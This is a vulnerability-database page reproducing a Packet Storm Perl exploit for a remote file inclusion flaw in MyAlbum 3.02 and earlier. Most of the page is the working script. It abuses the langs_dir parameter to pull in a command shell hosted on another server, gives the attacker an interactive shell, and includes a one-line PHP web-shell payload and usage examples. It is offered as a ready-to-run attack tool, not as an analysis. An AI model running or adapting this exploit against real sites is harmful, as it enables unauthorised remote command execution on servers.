Lucene search

K

myalbum302.txt

🗓️ 21 Nov 2006 00:00:00Reported by the_Edit0rType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 13 Views

MyAlbum <= 3.02 Remote File Inclusion Exploit using Per

Show more
Code
`#!/usr/bin/perl  
# """""""""""""""""""""""""""""""""""""""""""""""  
# """ :: :: ::::: :::: """  
# """ :: :: :: : :: """  
# """ :::: :: :: ::::: ::::: :::: """  
# """ :: :: ::: ::: :: :: :: :: :: """  
# """ :: :: :: : : ::::: :: :: :::: """  
# """ """  
# """""""""""""""""""""""""""""""""""""""""""""""  
#   
# Xmor$ DigitaL Hacking TeaM  
# MyAlbum <= 3.02 (langs_dir) Remote File Inclusion Exploit  
# coded By the_Edit0r  
# Original Advisory : http://Www.Xmors.com ( Pablic ) http://Www.Xmors.net (pirv8)   
#   
# perl cra.pl <target> <cmd shell location> <cmd shell variable>  
# perl cra.pl http://site.com/ http://site.com/cmd.txt cmd  
#  
# cmd shell example: <?passthru($_GET[cmd]);?>  
# cmd shell variable: ($_GET[cmd]);  
#  
# Greetz: Scorpiunix , KAMY4r , Sh3ll , SilliCONIC , Zer0.C0d3r   
# D3vil_B0y_ir , Tornado , DarkAngel , Behbood   
# Spical TNX Irania Hackers :  
# ( Aria-Security , Crouz , virangar ,DeltaHacking , Iranhackers  
# Kapa TeaM , Ashiyane , Shabgard , Simorgh-ev, Virangar )  
# Contact: the_3dit0r[at]yahoo[dot]coM  
  
use LWP::UserAgent;  
  
$Path = $ARGV[0];  
$Pathtocmd = $ARGV[1];  
$cmdv = $ARGV[2];  
  
if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}  
  
head();  
  
while()  
{  
print "[shell] \$";  
while(<STDIN>)  
{  
$cmd=$_;  
chomp($cmd);  
  
$xpl = LWP::UserAgent->new() or die;  
$req = HTTP::Request->new(GET =>$Path.'language.inc.php?langs_dir='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";  
  
$res = $xpl->request($req);  
$return = $res->content;  
$return =~ tr/[\n]/[....]/;  
  
if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}  
  
elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)  
{print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}  
elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}  
  
if($return =~ /(.*)/)  
  
  
{  
$finreturn = $1;  
$finreturn=~ tr/[....]/[\n]/;  
print "\r\n$finreturn\n\r";  
last;  
}  
  
else {print "[shell] \$";}}}last;  
  
sub head()  
{  
print "\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n";  
print " 'MyAlbum <= 3.02 (langs_dir) Remote File Inclusion Exploit'\r\n";  
print "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n";  
}  
sub usage()  
{  
head();  
print " Usage: perl cra.pl <target> <cmd shell location> <cmd shell variable>\r\n\n";  
print " <Site> - Full path to example: http://www.site.com/ \r\n";  
print " <cmd shell> - Path to cmd Shell e.g http://ServerShell.com/sh3ll.txt? \r\n";  
print " <cmd variable> - Command variable used in php shell \r\n";  
print "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n";  
print " By the_Edit0r \r\n";  
print " Xmors DigitaL Hacking TeaM \r\n";  
print "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n";  
exit();  
}  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
21 Nov 2006 00:00Current
7.4High risk
Vulners AI Score7.4
13
.json
Report